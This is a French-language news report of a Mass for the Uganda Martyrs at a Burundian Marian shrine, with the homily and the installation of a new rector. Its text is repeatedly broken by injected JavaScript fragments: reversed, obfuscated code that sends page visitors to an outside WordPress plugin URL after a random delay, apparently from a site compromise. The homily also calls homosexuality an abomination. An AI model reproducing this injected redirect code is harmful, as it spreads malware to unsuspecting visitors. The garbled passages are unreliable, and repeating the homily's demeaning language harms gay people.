La Solennité des Martyrs de l’Ouganda a été célébrée dans une joie immense au Sanctuaire marial de la paix et la réconciliation de Mont Sion Gikungu. Le célébrant principal de la messe animée en chants par la Chorale Saint Nicolas de Flüe, Père Herménégilde COYITUNGIYE, a déclaré que c’était un grand jour puisque on célébrait la vraie valeur de l’humanité.  Il a alors ajouté qu’au Sanctuaire c’était une très grande joie puisqu’on allait recevoir le nouveau Père Recteur du sanctuaire. Dans son allocution du début de la messe, le Père Herménégilde COYITUNGIYE a dit qu’il se présentait en deux personnes, d’abord comme le Recteur sortant après son mandat de trois ans 3 ans à la tête du sanctuaire et ensuite maintenant comme Père Supérieur des Peres Schoenstatt de Mont Sion et de la Région qui comprend la République Démocratique du Congo (RDC) et la Tanzanie. Il va sans dire qu’il était envoyé par le Père Supérieur Général des Pères de Schoenstatt de la Région Suisse qui gère notre sous-région. « Nous sommes ici comme Pères de la communauté et amis des Pères pour manifester notre soutien au Père Longin NTIRANYIBAGIRA qui va désormais prendre les fonctions de Père Recteur du Sanctuaire de la Reine de la paix et la réconciliation de Mont Sion Gikungu. Que chacun ici en soit témoin et le nouveau Père Recteur.  Elevons alors nos prières pour prier pour lui, offrons à Dieu son apostolat, pour que la Vierge Marie continue à avoir des disciples, et que l’Eglise continue à grandir et à se sanctifier. Merci de ce soutien », a renchéri le Père Herménégilde.  Il a alors souhaité une chaleureuse bienvenue à tout un chacun. Les Saintes Ecritures du jour étaient tirées du Second Livre des Macabées (7, 1-2. 9-14), le Psaumes responsorial 124 ; deuxième lecture, l’épitre se saint Paul aux Romains (8, 31b-39) et l’Evangile selon saint Matthieu (5, 1-12a).

Homélie

Père Herménégilde a annoncé que cette solennité était une bonne occasion d’admirer les martyrs de l’Ouganda, mais aussi tous ceux qui ont reçu ce toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}don de témoigner leur foi, jusqu’à accepter de verser leur sang. Cette solennité est normalement célébrée le 3 juin de chaque année, mais les églises du Burundi et du Rwanda ont préféré qu’on la célèbre le dimanche suivant la Sainte Trinité. Ces martyrs ont été pour l’Afrique et le monde entier un évangile vivant, qui n’est pas écrit dans les livres mais gravé dans les cœurs, ce qui rappelle cette parole de Dieu : « Désormais, je n’écrirai pas ma parole sur les morceaux de pierre, mais je la graverai dans vos cœurs ». Charles Luanga et ses compagnons ont été les premiers dans l’Afrique Subsaharienne à recevoir la bonne nouvelle. Ces Saints qui nos ancêtres dans la foi étaient très loin des frontières d’Israël, mais c’est comme si ce qu’on a entendu dans la première lecture parlait d’eux.  Et très surprenant encore, chaque mot de l’épitre de Saint Paul, écrite en Europe, parle de Charles Luanga et ses compagnons. En d’autres mots, après avoir été convaincus par cette Parole de Dieu, ils l’ont courageusement écrit en Afrique par leur sang.  Ils nous ont tracé le bon chemin de la vie. « En 2018, j’ai pu me rendre à Inamugongo pour vénérer leurs reliques et apprendre de plus près comment ils ont été martyrisés. Ce qui m’a beaucoup touché c’est le long trajet de 11km que ces martyrs ont parcouru lors de leur supplice depuis le palais royal et Inamugongo. Tout le long de ce chemin, ils ont été battus, torturés et trainés par terre, ce qui a fait que leur sang a coulé par terre tout le long du trajet. Ce sang, c’est l’évangile de Jésus Christ pour les gens de l’Ouganda et toute l’Afrique, a dit Père Herménégilde.

 Jésus nous dit, « …. votre récompense est grande dans les cieux ». (Mt5,12). Et nous devons comprendre ces paroles de l’Evangile : Heureux les pauvres …… Heureux ceux qui pleurent ……Ce langage peut nous sembler incompréhensible. Il y en a même qui en profitent pour critiquer les missionnaires et l’Eglise, et blâment leur enseignement comme la cause de la pauvreté en Afrique.  Pourtant il ne faut jamais ignorer le sacrifice des missionnaires qui ont quitté le nord pour venir en Afrique, jusqu’au Burundi abantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donnant derrière eux tout ce qu’ils avaient.  Au lieu de les appeler colons, tout en ignorant leurs efforts, nous ferions mieux de reconnaître leur contribution dans le développement de certains secteurs de la vie en Afrique : les premières écoles, et les premiers cadres formés dans ces écoles, les premières infrastructures sanitaires, etc.

« C’est seulement celui qui a reçu et l’Evangile qui peut se sacrifier et se toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donner pour les autres, a annoncé le célébrant principal ». Il ne peut plus être égoïste comme les puissants de ce monde quand ils ne veulent pas recevoir l’Evangile. Ils font comme le Roi Mwanga qui a martyrisé les premiers chrétiens de son pays.  C’est cette Parole que nos martyrs d’Ouganda ont comprise et l’ont mise en pratique. Quand tu penses aux richesses mondaines comme les maisons, voitures, l’argent, comment te sens-tu dans ton cœur? et quand ton cœur arrive enfin là où il y a ces richesses, le trésor du pays, avec possibilités d’en détourner, comment est-ce que tu te sens ?  Ceci concerne même les pauvres.   Ceci nous concerne tous, puisqu’ici sur terre les gens courent partout, suent, attrapent des maladies de fatigue comme la tension artérielle, le diabète, la tuberculose et bien d’autres.  Mais ils finissent par mourir et tomber dans l’oubli, laissant tout le monde se demander l’utilité de ses richesses qu’il avait amassées. Rappelons-nous de cet homme riche de la Bible qui s’est dit « Mon cœur repose-toi maintenant et commence à manger bien et à boire et faire des fêtes……», mais Jésus nous dit que la nuit même une voix lui dit, « Homme de peu d’intelligence, cette nuit même ton te sera enlevé, à quoi te serviront toutes tes richesses ? ».  Avez-vous entendu ces paroles, c’est comme ça. C’est pourquoi Jésus nous met en garde nous disant, « N’amassez pas des trésors sur la terre, où la teigne et la rouille détruisent, et où les voleurs percent et dérobent; mais amassez des trésors dans le ciel, où la teigne et la rouille ne détruisent point, et où les voleurs ne percent ni ne dérobent» (Mt6,19-20). Pourtant, malgré que nous connaissions par cœur cette parole, nous continuons à amasser nos richesses terrestres, ignorant la richesse céleste.  Il faut plutôt commencer à amasser la fortune du ciel maintenant pas demain, le temps presse. Mais comment amasser la fortune céleste, c’est quand ce que tu possèdes ne détourne pas ton cœur de Dieu, mais plutôt quand tu te dis, « je toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dois utiliser ce que je possède pour me rapprocher de Dieu, afin que ma récompense soit grande dans les cieux», a-t- il recommandé.

Jésus ne nous met pas seulement en garde sur la façon toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dont nous recherchons et gérons nos richesses, mais aussi en rapport les hommes en général. Parmi les causes du martyr, le Roi Mwanga voulait qu’ils pratiquèrent avec lui l’homosexualité.  Pensez à cette relation, un homme qui t’oblige à pratiquer une telle abomination simplement puisqu’il a ce mauvais esprit. Il faut couper très tôt ces types de relations qui incarnent le venin de Satan.  Pensez à un homme qui, étant à côté de sa femme, continue à communiquer par téléphone avec une autre femme qui veut le pousser à l’adultère, ou vice-versa. N’est-ce pas détruire sa propre famille ? Il faut dire comme ces jeunes de la Bible : « Nous sommes prêts à mourir plutôt que de transgresser les lois de nos pères ». Et vous les mariés, osez dire, «Plutôt que de transgresser mon alliance avec ma femme/mon mari devant l’autel je préfère mourir ».  Donnez de la valeur à tes promesses et alliances.  C’est ces paroles qui ont attisé dans le cœur de Charles Luanga et ses compagnons ce désir de martyr.  Que les veuves ne brisent pas leur alliance sous prétexte d’avoir quoi nourrir les enfants, tout ce qu’on reçoit dans ce chemin c’est du poison.  Dieu nous nourrit, et même les oiseaux de la forêt. Accepter de mourir de faim, d’être torturé, … au lieu de trahir les commandements de Dieu, a-t-il recommandé.

Aujourd’hui que nous célébrons les martyrs de l’Ouganda, ils nous enseignent de marcher dans la fierté et confiance fixant nos cœurs vers le ciel.  Aie confiance dans le ciel et dis- toi : « Je ne manquerai de rien puisque Jésus Christ s’occupe de moi ». Pensons toujours à cet honneur que nous avons, et laissons de nous attacher à ces choses minimes d’ici-bas mais fixons nos yeux vers le ciel, notre récompense au ciel.  En tout cas tout finit ici-bas. Les malades riches dépensent beaucoup d’argent mais tout finit par lâcher.  Ne nous soyons pas noyons alors dans ces choses du monde. Que les prières des Martyrs de l’Ouganda nous aident à nous confier au ciel puisque c’est maintenant même, que celui qui n’a pas encore commencé à amasser la fortune du ciel le fasse dès aujourd’hui. Mais aussi que la prière de la Vierge Marie, Notre Dame des Martyrs, soit notre grand enseignement pour tous ceux qui ont choisi de se confier à Jésus Christ ; qu’elle soit toujours près de nous. Je vous souhaite de ne jamais oublier que notre récompense nous attend au ciel.  Que tout le monde ne travaille plus ayant en tête le salaire à la fin du mois, mais le salaire du ciel, la joie éternelle, et que notre cœur ne soit plus là où il ne sera jamais satisfait.

Signalons qu’après l’homélie, c’était l’occasion de présentation du nouveau Père Recteur du Sanctuaire. Père Herménégilde COYITUNGIYE, parlant au nom du Supérieur Général, a alors annoncé le nom du nouveau Père Recteur, Père Longin Ntiranyibagira. Et après la profession de la foi avec les fidèles, le nouveau Père Recteur s’est assis sur le siège du célébrant principal de la messe en remplacement de Père Herménégilde qui avait jusqu’alors présidé la sainte messe. Le Père COYITUNGIYE lui toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donné les symboles de son apostolat : la clé du tabernacle du sanctuaire, la clé du sanctuaire, la Sainte Bible et l’étole.  Après a suivi la prière de la consécration à la Vierge Marie et l’acclamation du nouveau Recteur par les fidèles. Le nouveau Père Recteur a brièvement remercié tout le monde présent, particulièrement ses confrères Pères de Schoenstatt et les autres prêtres présents. Il n’a pas oublié de féliciter Père Herménégilde COYITUNGIYE qui venait de passer 6 mois et deux jours à la tête de la communauté régionale des Pères de Schoenstatt et lui a promis de continuer par là où il en était avec l’apostolat du sanctuaire. Enfin il a béni les nouveaux membres de la commission Justice et Paix et les a envoyés en mission.

Fulgence Ndayizeye